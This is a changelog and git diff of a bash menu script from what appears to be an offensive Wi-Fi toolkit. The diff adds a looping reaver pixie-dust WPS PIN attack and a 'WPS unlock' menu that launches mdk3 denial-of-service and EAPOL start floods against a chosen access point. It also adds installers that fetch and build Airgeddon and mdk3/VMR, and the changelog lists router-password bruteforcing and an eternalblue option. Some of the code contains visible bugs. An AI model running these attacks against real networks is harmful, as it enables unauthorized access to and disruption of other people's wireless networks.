v2.1.4
New WPS feature added: Pixie loop till pin found.
New WPS feature added:
Unlock WPS for APs with locked WPS.(beta)
New feature: Bruteforce
router's login password.
Remade old WEP menu.
Added option to re
arp-scan network.
Added option to show bandwidth via iftop tool.
Fixed
wash output if network has space in it.
Improved geolocation
feature.
Fixed arp-scan error.
Fixed major issue on handshake scan,
sometimes APs disappearing.
Fixed minor error in errors menu.
Added
description to information gathering tools.
Improved descriptions on
wifi tools.
Added two options to validate handshake.
Added
netool-toolkit to wifi tools.
Added website tools menu.
Added Leviathan
to website tools.
Added VMR and Airgeddon to WPS menu.
Added SQLmap
automated script to website tools and banner.
Added setting to change
the interface for arp-scan feature.
Added checking if interface
available before scan.
Added patator to other tools.
Added Evil-Droid to
remote access tools and keyboard shortcuts.
Improved pixie dust loop
attack.
Added NoSQLMap to website tools and keyboard shortcuts.
Added
option in settings to change iftop's interface.
Add e.g. to LHOST on
eternalblue.

diff --git a/lh3 b/lh3
--- a/lh3
+++ b/lh3
@@ -1,25 +1,87 @@
 #! /bin/bash
 
-#############DEFAULTS###############
-
-#setting yellow-start 
-YS="\e[1;33m"
-#setting color-end
-CE="\e[0m"
-#setting red-start
-RS="\e[1;31m"
-#setting frequent stings
-YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
-YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
-YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
-PAKT="Press "$YS"any key$CE to"
-PAKTC="Press "$YS"any key$CE to continue..."
-PAKTGB="Press "$YS"any key$CE to go back..."
-READAK="read -n 1"
-####################################
 WLANNM=$(cat /root/lscript/wlanmon.txt)
 export WLANNM
 SCW=1
+function defaults_lh3
+{
+#path for lscript
+	LPATH="/root/lscript"
+	export LPATH
+#path for keyboard shortcuts
+	KSPATH=""$LPATH"/ks"
+	export KSPATH
+#making sure the kspath is set
+	if [[ ! -d "$KSPATH" ]]
+	then
+		mkdir "$KSPATH"
+	fi
+#ALFA SUPPORT SETTING
+	if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
+	then
+		read ALFA < "$LPATH"/settings/AWUS036ACH.txt
+	else
+		ALFA="no"
+	fi
+#yellow start 
+	YS="\e[1;33m"
+#blue start 
+	BS="\e[0;34m"
+#color end
+	CE="\e[0m"
+#red start
+	RS="\e[1;31m"
+#black start
+	BLS="\e[0;30m"
+#dark gray start
+	DGYS="\e[1;30m"
+#light blue start
+	LBS="\e[1;34m"
+#green start
+	GNS="\e[0;32m"
+#light green start
+	LGNS="\e[1;32m"
+#cyan start
+	CYS="\e[0;36m"
+#light cyan start
+	LCYS="\e[1;36m"
+#light red start
+	DRS="\e[0;31m"
+#purple start
+	PS="\e[0;35m"
+#light purple start
+	LPS="\e[1;35m"
+#brown start
+	BRS="\e[0;33m"
+#light gray start
+	LGYS="\e[0;37m"
+#white start
+	WHS="\e[1;37m"
+#setting custom color for logo
+	if [[ -f "$LPATH"/settings/logocolor.txt ]]
+	then
+		read COL < "$LPATH"/settings/logocolor.txt
+	else
+		COL="$RS"
+	fi
+#setting frequent stings
+	YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
+	YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
+	YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
+	PAKT="Press "$YS"any key$CE to"
+	PAKTC="Press "$YS"any key$CE to continue..."
+	PAKTGB="Press "$YS"any key$CE to go back..."
+	TNI=""$RS"Tool is not installed. To install it type '"$CE""$YS"install"$CE""$RS"'."$CE""
+#code to read from keyboard without return
+	READAK="read -n 1"
+#default MAC when starting monitor
+	DEFMAC="00:11:22:33:44:55"
+	
+	wififb="wififb"
+	
+#default packets to inject per second on wps unlock with mdk3
+	DPPS=400
+}
 function enable2_wlan
 {
 	echo -e "Enabling $WLANN..."
@@ -111,6 +173,52 @@ function install_wifiautopwner
 	cd
 	git clone https://github.com/Mi-Al/WiFi-autopwner.git
 }
+function install_vmr
+{
+	if [[ -d /root/mdk3-v6 || -d /root/VMR ]]
+	then
+		echo -e "Removing old..."
+		echo -e "$PAKTC"
+		$READAK
+		rm -r /root/mdk3-v6
+		if [[ -f /root/VMR-MDK-K2-2017R-012x2.zip ]]
+		then
+			rm /root/VMR-MDK-K2-2017R-012x2.zip
+		fi
+		if [[ -d /root/VMR ]]
+		then
+			rm -r /root/VMR
+		fi
+	fi
+	cd
+	wget https://github.com/musket33/VMR-MDK-Kali2-Kali2016/raw/master/VMR-MDK-K2-2017R-012x2.zip
+	unzip /root/VMR-MDK-K2-2017R-012x2.zip -d /root/VMR
+	cp -r /root/VMR/mdk3-v6 /root/
+	cd /root/mdk3-v6
+	make
+	make install
+	chmod 755 /root/mdk3-v6/*
+	chmod +x /root/VMR/*.sh
+	cd
+}
+function install_airgeddon
+{
+	if [[ -d "/root/airgeddon" ]]
+	then
+		echo -e "Removing old..."
+		echo -e "$PAKTC"
+		$READAK
+		rm -r /root/airgeddon
+	fi
+	echo -e "Installing..."
+	sleep 1
+	echo -e "Installing Airgeddon"
+	echo -e "Tool by v1s1t0r1sh3r3"
+	cd
+	git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
+	cd airgeddon
+	chmod +x airgeddon.sh
+}
 function dash_calc
 {
 	
@@ -136,7 +244,7 @@ function scan_wash
 		echo -e "Scaning in new terminal..."
 		echo -e ""$YS"PRESS CTRL C IN WASH WHEN READY."$CE""
 		sleep 1
-		xterm -geometry 80x25+9999+9999 -e "wash  -i $WLANNM | tee /root/lscript/tempwash "
+		xterm -geometry 80x25+9999+9999 -T "Press Ctrl C when ready" -e "wash  -i $WLANNM | tee /root/lscript/tempwash "
 	fi
 		SCW=1
 		clear
@@ -158,25 +266,42 @@ function scan_wash
 			break
 		elif [[ "$WASHSCAN" -ge 1 ]]
 		then
+			if [[ "$WASHSCAN" -gt "$lines" ]]
+			then
+				echo -e ""$RS"Wrone choice..."$CE""
+				SCW=0
+				sleep 2
+				continue
+			fi
 			WASHSCAN2="${nnum[$WASHSCAN]}"
+			BSSIDT="${abssid[$WASHSCAN2]}"
+			CHANT="${achannel[$WASHSCAN2]}"
+			ESSIDT="${aessid[$WASHSCAN2]}"
+			export BSSIDT
+			export CHANT
+			export ESSIDT
 			if [[ ! "${alock[WASHSCAN2]}" = "No" ]]
 			then
 				clear
 				echo -e ""$RS"This AP is locked"$CE""
-				sleep 3
+				sleep 1
 				SCW=0
+				echo -e "Do you want to try to unlock it?"$YNYES""
+				read UNW
+				if [[ ! "$UNW" = "n" ]]
+				then
+					unlock_wps
+				fi
 				continue
 			fi
-			BSSIDT="${abssid[$WASHSCAN2]}"
-			CHANT="${achannel[$WASHSCAN2]}"
-			ESSIDT="${aessid[$WASHSCAN2]}"
 			while true
 			do
 				clear
 				echo -e ""$RS"----------You need strong connection------------"$CE""
-				echo -e ""$YS" 1"$CE") Pixie dust       fast"
-				echo -e ""$YS" 2"$CE") Bruteforse       slow"
-				echo -e ""$YS" 3"$CE") Bully            fast+automated"
+				echo -e ""$YS" 1"$CE") Pixie dust                         fast"
+				echo -e ""$YS" 2"$CE") Pixie loop till pin found          fast"
+				echo -e ""$YS" 3"$CE") Bruteforse                         slow"
+				echo -e ""$YS" 4"$CE") Bully"
 				echo -e ""$YS" r"$CE") Rescan"
 				echo -e ""$YS" b"$CE") Go back"
 				echo -e "Choose: "
@@ -196,8 +321,11 @@ function scan_wash
 					pixie_attack
 				elif [[ "$WPSL" = "2" ]]
 				then
-					reaver_attack
+					pixie_loop
 				elif [[ "$WPSL" = "3" ]]
+				then
+					reaver_attack
+				elif [[ "$WPSL" = "4" ]]
 				then
 					bully_script
 				fi		
@@ -213,6 +341,177 @@ function scan_wash
 			SCW=0
 		fi
 	done
+}
+function unlock_wps
+{
+while true
+do
+	clear
+	TERMINALTITLE="WPS UNLOCK"
+	dash_calc
+	printf '\033]2;WPS UNLOCK\a'
+	echo -e ""$BS"2 or 3 network interfaces are recommended for this attack"$CE""
+	echo -e ""
+	if [[ "$INTS" = "" ]]
+	then
+		INTS=1
+	fi
+	echo -e ""$YS"set"$CE") Set your interface(s)                   Current:"$INTS""
+	echo -e ""$YS" ch"$CE") Check if unlocked"
+	#~ echo -e ""$YS"  t"$CE") Set attack's timeout                    Current:"$TM" secs"
+	echo -e ""$BS"Attacks:"$CE""
+	echo -e ""$YS" 1"$CE") DOS flood"
+	echo -e ""$YS" 2"$CE") EAPOL start flood"
+	#~ echo -e ""$YS" 3"$CE") Cause Michael failure (only TKIP / AES+TKIP)"
+	#~ echo -e ""$YS" 4"$CE") "
+	echo -e ""$YS" b"$CE") Go back"
+	echo -e "Choose:"
+	read UNL
+	clear
+	if [[ "$UNL" = "b" || "$UNL" = 00 || "$UNL" = 0 ]]
+	then
+		break
+	elif [[ "$UNL" = "ch" || "$UNL" = "c" ]]
+	then
+		xterm -T "Check if unlocked" -e 'wash -i $WLANNM' & disown
+	elif [[ "$UNL" = "1" ]]
+	then
+		n=0
+		while true
+		do
+			if [[ "$n" = 0 ]]
+			then
+				xterm -T "DOS flood on $WLANNM" -hold -e 'mdk3 $WLANNM a -a $BSSIDT -m && echo -e "" && echo -e "Close this window manually"' & disown
+				n=$((n+1))
+				continue
+			else
+				if [[ "$n" != "$INTS" ]]
+				then
+					CURIN="${NI[$n]}"
+					if [[ "$CURIN" = "" ]]
+					then
+						echo -e ""$RS"Error 15. Interface not found."$CE""
+						sleep 3
+					else
+						xterm -T "DOS flood on $CURIN" -hold -e 'mdk3 $CURIN a -a $BSSIDT -m && echo -e "" && echo -e "Close this window manually"' & disown
+					fi
+				else
+					break
+				fi
+			fi
+			n=$((n+1))
+		done
+	elif [[ "$UNL" = "2" ]]
+	then
+		echo -e "Packets to inject per second:("$YS"Enter"$CE"="$DPPS")"
+		read PPS
+		if [[ "$PPS" = "" ]]
+		then
+			PPS="$DPPS"
+		fi
+		if [[ "$PPS" -le 0 ]]
+		then
+			echo -e ""$RS"Wrong choice"$CE""
+			sleep 2
+			continue
+		fi
+		export PPS
+		n=0
+		while true
+		do
+			if [[ "$n" = 0 ]]
+			then
+				xterm -T "EAPOL start flood on $WLANNM" -hold -e 'mdk3 $WLANNM x 0 -t $BSSIDT -n "$ESSIDT" -s $PPS && echo -e "" && echo -e "Close this window manually"' & disown
+				#~ xterm -T "EAPOL start flood on $WLANNM" -hold -e 'mdk3 $WLANNM m -t $BSSIDT  && echo -e "" && echo -e "Close this window manually"' & disown
+				#~ xterm -T "EAPOL start flood on $WLANNM" -hold -e 'mdk3 $WLANNM b -t $BSSIDT && echo -e "" && echo -e "Close this window manually"' & disown
+				n=$((n+1))
+				continue
+			else
+				if [[ "$n" != "$INTS" ]]
+				then
+					CURIN="${NI[$n]}"
+					if [[ "$CURIN" = "" ]]
+					then
+						echo -e ""$RS"Error 16. Interface not found."$CE""
+						sleep 3
+					else
+						xterm -T "EAPOL start flood on $CURIN" -hold -e 'mdk3 $CURIN x 0 -t $BSSIDT -n "$ESSIDT" -s $PPS && echo -e "" && echo -e "Close this window manually"' & disown
+					fi
+				else
+					break
+				fi
+			fi
+			n=$((n+1))
+		done
+	elif [[ "$UNL" = "set" ]]
+	then
+		while true
+		do
+			clear
+			echo -e ""$BS"Current interface number"$CE": "$INTS""
+			echo -e ""$YS" a"$CE") Add another interface"
+			echo -e ""$YS" r"$CE") Reset interfaces"
+			echo -e ""$YS" b"$CE") Go back"
+			read NIN
+			clear
+			if [[ "$NIN" = "b" || "$NIN" = 00 ]]
+			then
+				break
+			elif [[ "$NIN" = "r" ]]
+			then
+				while true
+				do
+					newints=$((INTS-1))
+					if [[ "$newints" -lt 1 ]]
+					then
+						echo -e ""$RS"No interfaces added to reset"$CE""
+						sleep 2
+						break
+					else
+						#~ n=1
+						#~ while [[ "$newints" != 0 ]]
+						#~ do
+							#~ NI[$n]=""
+							#~ n=$((n+1))
+							#~ newints=$((newints-1))
+						#~ done
+						INTS=1
+						break
+					fi
+				done
+			elif [[ "$NIN" = "a" ]]
+			then
+				echo -e "New interface: "
+				read NII
+				TEST3=$((ifconfig | grep "$NII"))
+				if [[ "$TEST3" = "" ]]
+				then
+					echo -e ""$RS"Could not find this interface on your system"$CE""
+					sleep 3
+				else
+					echo -e ""BS"Interface found!"$CE""
+					sleep 2
+					clear
+					checkmonitor=$((iwconfig "$NII" | grep "Mode:Monitor"))
+					if [[ "$checkmonitor" = "" ]]
+					then
+						echo -e ""$BS"Enabling monitor mode for "$NII"..."
+						airmon-ng start $NII | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1 &> /dev/null && echo -e ""$YS"Done"$CE""
+						checkmonitor=$((iwconfig "$NII" | grep "Mode:Monitor"))
+						if [[ "$checkmonitor" = "" ]]
+						then
+							echo -e ""$RS"Couldn't start monitor mode"$CE""
+							sleep 2
+							continue
+						fi
+					fi
+					NI[$INTS]="$NII"
+					INTS=$((INTS+1))
+				fi
+			fi
+		done
+	fi
+done
 }
 function reaver_attack
 {
@@ -231,6 +530,63 @@ function reaver_attack
 	echo -e "Press "$YS"enter"$CE" to go back"
 	read	
 }
+function pixie_loop
+{
+	clear
+	TERMINALTITLE="PIXIE LOOP ATTACK"
+	dash_calc
+	printf '\033]2;PIXIE LOOP ATTACK\a'
+	echo -e "Delay between every attempt("$YS"Enter"$CE"=15): "
+	read DELAY
+	if [[ "$DELAY" = "" ]]
+	then
+		DELAY=15
+	elif [[ ! "$DELAY" -ge 0 ]]
+	then
+		DELAY=0
+	fi
+	while true
+	do
+		trap 'break' SIGINT
+		echo "" > "$LPATH"/wpslogloop
+		reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -K 1 -f -vvv <<< $'y\n' | tee /root/lscript/wpslogloop
+		if [[ -f "$LPATH"/wpslog ]]
+		then
+			TTT=$(cat "$LPATH"/wpslogloop | grep "WPS pin not found!")
+			TTTT=$(cat "$LPATH"/wpslogloop | grep "WPS pin:    <empty>")
+			TTT2=$(cat "$LPATH"/wpslogloop | grep "found")
+			TTT3=$(cat "$LPATH"/wpslogloop | grep "WPA")
+			if [[ "$TTT" != "" || "$TTTT" != "" ]]
+			then
+				echo -e ""$RS"Pin not found. Retrying..."$CE""
+			elif [[ "$TTT2" != "" || "$TT3" != "" ]]
+			then
+				echo -e ""$YS"Pin found!!"$CE""
+				cp "$LPATH"/wpslog >> "$LPATH"/wpslog
+				sleep 2
+				break
+			else
+				echo -e ""$RS"Pin not found. Retrying..."$CE""
+			fi
+			if [[ "$DELAY" -gt 1 ]]
+			then
+				echo -e "Waiting "$DELAY" seconds..."
+			elif [[ "$DELAY" = 1 ]]
+			then
+				echo -e "Waiting "$DELAY" second..."
+			fi
+			sleep $DELAY
+		else
+			echo -e ""$RS"Error 10. Could not locate wpslogloop file."$CE""
+			sleep 4
+			break
+		fi
+	done
+	trap - SIGINT
+	echo -e "Press "$YS"enter"$CE" to go back"
+	read
+	
+}
 function pixie_attack
 {
 	clear
@@ -238,13 +594,13 @@ function pixie_attack
 	dash_calc
 	printf '\033]2;PIXIE DUST ATTACK\a'
 	#xterm -geometry 90x70+0+0 -e "aireplay-ng $WLANNM -1 10 -a $BSSIDT" & disown
-	reaver -i $WLANNM -b $BSSIDT -c $CHANT -K 1 -S -N -vvv | tee /root/lscript/wpslog
+	reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -f --pixie-dust=1 -vvv | tee /root/lscript/wpslog
 	echo -e "Press "$YS"enter"$CE" to go back"
 	read
 }
 function reaver_wpastart
 {
-	reaver -i $WLANNM -b $BSSIDT -c $CHANT -p $WPST -L -f -N -g 1 -d 2 -vvv
+	reaver -i $WLANNM -b $BSSIDT -c $CHANT -N -p $WPST -L -f -g 1 -d 2 -vvv
 	echo -e "$PAKTC"
 	read
 }
@@ -275,6 +631,18 @@ do
 	abssid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $1}')
 	achannel[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $2}')
 	aessid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $6}')
+	ti=7
+	while true
+	do
+		essidtest=$(cat $file | awk -v nn="$nnn" -v po="$ti" '{if(NR==nn)print $po}')
+		if [[ "$essidtest" != "" ]]
+		then
+			aessid[$nnn]="${aessid[$nnn]} $essidtest"
+		else
+			break
+		fi
+		ti=$((ti+1))
+	done
 	alock[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $5}')
 	if [[ ! ${alock[$nnn]} = "No" ]]
 	then
@@ -500,28 +868,41 @@ dash_calc
 printf '\033]2;WPS MENU\a'
 if [[ "$ESSIDT" = "" ]]
 then
-	echo -e ""$YS" 1"$CE") Scan with wash         Selected: "$RS"None"$CE""
+	echo -e ""$YS" 1"$CE") Scan with wash              Selected: "$RS"None"$CE""
 else
-	echo -e ""$YS" 1"$CE") Scan with wash         Selected: "$YS"$ESSIDT"$CE""
+	echo -e ""$YS" 1"$CE") Scan with wash              Selected: "$YS"$ESSIDT"$CE""
 fi
 echo -e ""$YS" 2"$CE") Reaver bruteforce"
-echo -e ""$YS" 3"$CE") Reaver                 (if you already have the WPS pin)"
+echo -e ""$YS" 3"$CE") Reaver                      (if you already have the WPS pin)"
 echo -e ""$YS" 4"$CE") Pixie Dust"
+echo -e ""$YS" 5"$CE") Pixie loop till pin found"
 if [[ -f /usr/bin/bully ]]
 then
-	echo -e ""$YS" 5"$CE") Bully                  AUTOMATED SCRIPT"
-	echo -e ""$YS" 6"$CE") Bully"
+	echo -e ""$YS" 6"$CE") Bully                       AUTOMATED SCRIPT"
+	echo -e ""$YS" 7"$CE") Bully"
 else
-	echo -e ""$RS" 5"$CE") "$RS"Bully"$CE"                   AUTOMATED SCRIPT"
-	echo -e ""$RS" 6"$CE") "$RS"Bully"$CE""
+	echo -e ""$RS" 6"$CE") "$RS"Bully"$CE"                        AUTOMATED SCRIPT"
+	echo -e ""$RS" 7"$CE") "$RS"Bully"$CE""
 fi
 if [[ -d /root/WiFi-autopwner ]]
 then
-	echo -e ""$YS" 7"$CE") WiFi autopwner"
+	echo -e ""$YS" 8"$CE") WiFi autopwner"
 else
-	echo -e ""$RS" 7"$CE") "$RS"WiFi autopwner"$CE""
+	echo -e ""$RS" 8"$CE") "$RS"WiFi autopwner"$CE""
 fi
-echo -e ""$YS" 8"$CE") See latest log"
+if [[ -d /root/airgeddon ]]
+then
+	echo -e ""$YS" 9"$CE") Airgeddon"
+else
+	echo -e ""$RS" 9"$CE") "$RS"Airgeddon"$CE""
+fi
+if [[ -d /root/VMR ]]
+then
+	echo -e ""$YS"10"$CE") VMR"
+else
+	echo -e ""$RS"10"$CE") "$RS"VMR"$CE""
+fi
+echo -e ""$YS"11"$CE") See latest log"
 echo -e ""$YS" 0"$CE") Exit"
 echo -e "Choose: "
 read -e YN
@@ -564,6 +945,15 @@ then
 	fi
 elif [[ "$YN" = "5" ]]
 then
+	if [[ "$ESSIDT" != "" ]]
+	then
+		pixie_loop
+	else
+		echo -e ""$RS"No network selected"$CE""
+		sleep 2
+	fi
+elif [[ "$YN" = "6" ]]
+then
 	if [[ -f /usr/bin/bully ]]
 	then
 		if [[ "$ESSIDT" != "" ]]
@@ -585,7 +975,7 @@ then
 			start2_menu
 		fi
 	fi
-elif [[ "$YN" = "6" ]]
+elif [[ "$YN" = "7" ]]
 then
 	if [[ -f /root/bully/src/bully.py ]]
 	then
@@ -604,7 +994,7 @@ then
 			start2_menu
 		fi
 	fi
-elif [[ "$YN" = "7" ]]
+elif [[ "$YN" = "8" ]]
 then
 	if [[ -f /root/WiFi-autopwner/wifi-autopwner.s ]]
 	then
@@ -623,7 +1013,44 @@ then
 			start2_menu
 		fi
 	fi
-elif [[ "$YN" = "8" ]]
+elif [[ "$YN" = "9" ]]
+then
+	if [[ -d "/root/airgeddon" ]]
+	then
+		cd /root/airgeddon
+		./airgeddon.sh
+		cd
+	else
+		echo -e ""$RS"Airgeddon isn't installed.Type '"$CE""$YS"install"$CE""$RS"' to stop monitor mode and install it."$CE""
+		read INSTALL
+		if [[ "$INSTALL" = "install" ]]
+		then
+			stop2_menu
+			echo -e "Press "$YS"enter"$CE" when connected to a network"
+			read ENT
+			install_airgeddon
+			start2_menu
+		fi
+	fi
+elif [[ "$YN" = "10" ]]
+then
+	if [[ -d "/root/VMR" ]]
+	then
+		cd /root/VMR
+		./VMR-MDK-K2-2017R-012x2.sh
+	else
+		echo -e ""$RS"VMR isn't installed.Type '"$CE""$YS"install"$CE""$RS"' to stop monitor mode and install it."$CE""
+		read INSTALL
+		if [[ "$INSTALL" = "install" ]]
+		then
+			stop2_menu
+			echo -e "Press "$YS"enter"$CE" when connected to a network"
+			read ENT
+			install_vmr
+			start2_menu
+		fi
+	fi
+elif [[ "$YN" = "11" ]]
 then
 	cat /root/lscript/wpslog
 	echo -e "Press "$YS"enter"$CE" to go back"
@@ -636,4 +1063,5 @@ done
 }
 
 ####################################
+defaults_lh3
 main_wps_options
